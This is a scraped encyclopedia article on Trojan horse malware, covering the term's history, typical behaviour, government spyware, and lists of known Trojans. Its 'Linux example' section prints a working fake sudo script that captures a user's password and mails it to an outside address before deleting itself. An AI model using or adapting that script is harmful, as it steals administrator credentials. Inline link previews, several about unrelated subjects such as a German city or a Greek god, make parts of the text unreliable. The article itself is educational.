computing Computing is any goal-oriented activity requiring, benefiting from, or creating computing machinery. It includes the study and experimentation of algorithmic processes, and development of both hardware and software. Computing has scientific, ...

, a Trojan horse is any malware that misleads users of its true intent. The term is derived from the

Ancient Greek Ancient Greek includes the forms of the Greek language used in ancient Greece and the ancient world from around 1500 BC to 300 BC. It is often roughly divided into the following periods: Mycenaean Greek (), Dark Ages (), the Archaic p ...

story of the deceptive

Trojan Horse The Trojan Horse was a wooden horse said to have been used by the Greeks during the Trojan War to enter the city of Troy and win the war. The Trojan Horse is not mentioned in Homer's ''Iliad'', with the poem ending before the war is concluded, ...

that led to the fall of the city of

Troy Troy ( el, Τροία and Latin: Troia, Hittite: 𒋫𒊒𒄿𒊭 ''Truwiša'') or Ilion ( el, Ίλιον and Latin: Ilium, Hittite: 𒃾𒇻𒊭 ''Wiluša'') was an ancient city located at Hisarlik in present-day Turkey, south-west of Ç ...

. Trojans generally spread by some form of social engineering; for example, where a user is duped into executing an

email Electronic mail (email or e-mail) is a method of exchanging messages ("mail") between people using electronic devices. Email was thus conceived as the electronic ( digital) version of, or counterpart to, mail, at a time when "mail" mean ...

attachment disguised to appear innocuous (e.g., a routine form to be filled in), or by clicking on some fake advertisement on social media or anywhere else. Although their payload can be anything, many modern forms act as a

backdoor A back door is a door in the rear of a building. Back door may also refer to: Arts and media * Back Door (jazz trio), a British group * Porta dos Fundos (literally “Back Door” in Portuguese) Brazilian comedy YouTube channel. * Works so titl ...

, contacting a controller who can then have unauthorized access to the affected computer. Ransomware attacks are often carried out using a Trojan. Unlike computer viruses and

worms Worms may refer to: *Worm, an invertebrate animal with a tube-like body and no limbs Places *Worms, Germany Worms () is a city in Rhineland-Palatinate, Germany, situated on the Upper Rhine about south-southwest of Frankfurt am Main. It had ...

, Trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves.

Use of the term

It's not clear where or when the concept, and this term for it, was first used, but by 1971 the first

Unix Unix (; trademarked as UNIX) is a family of multitasking, multiuser computer operating systems that derive from the original AT&T Unix, whose development started in 1969 at the Bell Labs research center by Ken Thompson, Dennis Ritchie, an ...

manual assumed its readers knew both: Another early reference is in a US Air Force report in 1974 on the analysis of vulnerability in the

Multics Multics ("Multiplexed Information and Computing Service") is an influential early time-sharing operating system based on the concept of a single-level memory.Dennis M. Ritchie, "The Evolution of the Unix Time-sharing System", Communications of ...

computer systems. It was made popular by

Ken Thompson Kenneth Lane Thompson (born February 4, 1943) is an American pioneer of computer science. Thompson worked at Bell Labs for most of his career where he designed and implemented the original Unix operating system. He also invented the B programmi ...

in his 1983 Turing Award acceptance lecture "Reflections on Trusting Trust", subtitled: ''To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software.'' He mentioned that he knew about the possible existence of Trojans from a report on the security of Multics.

Behavior

Once installed, Trojans may perform a range of malicious actions. Many tend to contact one or more

Command and Control Command and control (abbr. C2) is a "set of organizational and technical attributes and processes ... hatemploys human, physical, and information resources to solve problems and accomplish missions" to achieve the goals of an organization or en ...

(C2) servers across the Internet and await instruction. Since individual Trojans typically use a specific set of ports for this communication, it can be relatively simple to detect them. Moreover, other malware could potentially "take over" the Trojan, using it as a proxy for malicious action. In German-speaking countries,

spyware Spyware (a portmanteau for spying software) is software with malicious behaviour that aims to gather information about a person or organization and send it to another entity in a way that harms the user—for example, by violating their priva ...

used or made by the government is sometimes called ''govware''. Govware is typically a Trojan software used to intercept communications from the target computer. Some countries like Switzerland and Germany have a legal framework governing the use of such software.Basil Cupa
Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware)
LISS 2013, pp. 419–428 Examples of govware Trojans include the Swiss

MiniPanzer and MegaPanzer MiniPanzer and MegaPanzer are two variants of ''Bundestrojaner'' (German for federal Trojan horse) written for ERA IT Solutions (a Swiss federal government contractor) by software engineer Ruben Unteregger, and later used by Switzerland's Feder ...

and the German "state Trojan" nicknamed R2D2. German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it becomes encrypted via other applications. Due to the popularity of

botnets A botnet is a group of Internet-connected devices, each of which runs one or more bots. Botnets can be used to perform Distributed Denial-of-Service (DDoS) attacks, steal data, send spam, and allow the attacker to access the device and its conn ...

among hackers and the availability of advertising services that permit authors to violate their users' privacy, Trojans are becoming more common. According to a survey conducted by

BitDefender Bitdefender is a Romanian cybersecurity technology company headquartered in Bucharest, Romania, with offices in the United States, Europe, Australia and the Middle East. The company was founded in 2001 by the current CEO and main shareholder, ...

from January to June 2009, "Trojan-type malware is on the rise, accounting for 83% of the global malware detected in the world." Trojans have a relationship with worms, as they spread with the help given by worms and travel across the internet with them. BitDefender has stated that approximately 15% of computers are members of a botnet, usually recruited by a Trojan infection.

Linux example

A ''Trojan horse'' is a

program Program, programme, programmer, or programming may refer to: Business and management * Program management, the process of managing several related projects * Time management * Program, a part of planning Arts and entertainment Audio * Progra ...

that purports to perform some obvious function, yet upon execution it compromises the user's security. One easy program is a new version of the Linux sudo command. The command is then copied to a publicly writable directory like /tmp. If an administrator happens to be in that directory and executes sudo, then the ''Trojan horse'' might be executed. Here is a working version: : # sudo # ---- # Turn off the character echo to the screen. stty -echo /bin/echo -n "Password for `whoami`: " read x /bin/echo "" # Turn back on the character echo. stty echo echo $x , mail -s "`whoami` password" outside@creep.com sleep 1 echo Sorry. rm $0 exit 0 To prevent a

command-line A command-line interpreter or command-line processor uses a command-line interface (CLI) to receive commands from a user in the form of lines of text. This provides a means of setting parameters for the environment, invoking executables and pro ...

based ''Trojan horse'', set the . entry in the PATH= environment variable to be located at the tail end. For example: PATH=/usr/local/bin:/usr/bin:..

Notable examples

Private and governmental

* ANOM - FBI * 0zapftis / r2d2 StaatsTrojaner – DigiTask *

DarkComet DarkComet is a remote access trojan (RAT) developed by Jean-Pierre Lesueur (known as DarkCoderSc), an independent programmer and computer security coder from France. Although the RAT was developed back in 2008, it began to proliferate at the sta ...

– CIA / NSA *

FinFisher FinFisher, also known as FinSpy, is surveillance software marketed by Lench IT Solutions plc, which markets the spyware through law enforcement channels. FinFisher can be covertly installed on targets' computers by exploiting security lapses in t ...

– Lench IT solutions / Gamma International * DaVinci / Galileo RCS – HackingTeam *

Magic Lantern The magic lantern, also known by its Latin name , is an early type of image projector that used pictures—paintings, prints, or photographs—on transparent plates (usually made of glass), one or more lenses, and a light source. Because a si ...

– FBI * SUNBURST – SVR/

Cozy Bear Cozy Bear, classified by the United States federal government as advanced persistent threat APT29, is a Russian hacker group believed to be associated with one or more intelligence agencies of Russia. The Dutch General Intelligence and Securi ...

(suspected) * TAO QUANTUM/FOXACID – NSA *

WARRIOR PRIDE WARRIOR PRIDE is the GCHQ and NSA code name for a pair of spyware kits that can be installed on the iPhone and Android-based smartphones. Information about these kits was published by the press on 27 January 2014 from the documents leaked by Ed ...

– GCHQ

Publicly available

* EGABTR – late 1980s * Netbus – 1998 (published) * Sub7 by Mobman – 1999 (published) *

Back Orifice Back Orifice (often shortened to BO) is a computer program designed for remote administration, remote system administration. It enables a user to control a computer running the Microsoft Windows operating system from a remote location.Richtel, M ...

– 1998 (published) * Beast – 2002 (published) * Bifrost Trojan – 2004 (published) *

– 2008-2012 (published) *

Blackhole exploit kit The Blackhole exploit kit was, as of 2012, the most prevalent web threat, where 29% of all web threats detected by Sophos and 91% by AVG are due to this exploit kit. Its purpose is to deliver a malicious payload to a victim's computer. Acco ...

– 2012 (published) * Gh0st RAT – 2009 (published) * MegaPanzer BundesTrojaner – 2009 (published) *

MEMZ MEMZ is a brand of vehicle engines related to Melitopol Engine Factory ( uk, Мелітопольський моторний завод; literally "Melitopol Motor Plant" ), which is located in Melitopol, Zaporizhzhia Oblast and it is a part ...

by Leurak – 2016 (published)

Detected by security researchers

* Twelve Tricks – 1990 * Clickbot.A – 2006 (discovered) *

Zeus Zeus or , , ; grc, Δῐός, ''Diós'', label= genitive Boeotian Aeolic and Laconian grc-dor, Δεύς, Deús ; grc, Δέος, ''Déos'', label= genitive el, Δίας, ''Días'' () is the sky and thunder god in ancient Greek reli ...

– 2007 (discovered) * Flashback Trojan – 2011 (discovered) * ZeroAccess – 2011 (discovered) *

Koobface Koobface is a network worm that attacks Microsoft Windows, Mac OS X, and Linux platforms. This worm originally targeted users of networking websites like Facebook, Skype, Yahoo Messenger, and email websites such as GMail, Yahoo Mail, and AO ...

– 2008 (discovered) *

Vundo The Vundo Trojan (commonly known as Vundo, Virtumonde or Virtumondo, and sometimes referred to as MS Juan) is either a Trojan horse or a computer worm that is known to cause popups and advertising for rogue antispyware programs, and sporadical ...

– 2009 (discovered) *

Coreflood Coreflood is a trojan horse and botnet created by a group of Russian hackers and released in 2010. The FBI included on its list of infected systems "approximately 17 state or local government agencies, including one police department; three airport ...

– 2010 (discovered) *

Tiny Banker Trojan Tiny Banker Trojan, also called Tinba, is a malware program that targets financial institution websites. It is a modified form of an older form of viruses known as Banker Trojans, yet it is much smaller in size and more powerful. It works by estab ...

– 2012 (discovered) * SOVA - 2022 (discovered) *

Shedun Shedun is a family of malware software (also known as Kemoge, Shiftybug and Shuanet) targeting the Android operating system first identified in late 2015 by mobile security company Lookout, affecting roughly 20,000 popular Android applications. L ...

Android malware – 2015 (discovered)

Capitalization

The computer term "Trojan horse" is derived from the legendary

of the ancient city of

. For this reason "Trojan" is often capitalized. However, while style guides and dictionaries differ, many suggest a lower case "trojan" for normal use.

References

External links

* * {{DEFAULTSORT:Trojan Horse (Computing) Social engineering (computer security) Spyware Web security exploits Cyberwarfare Security breaches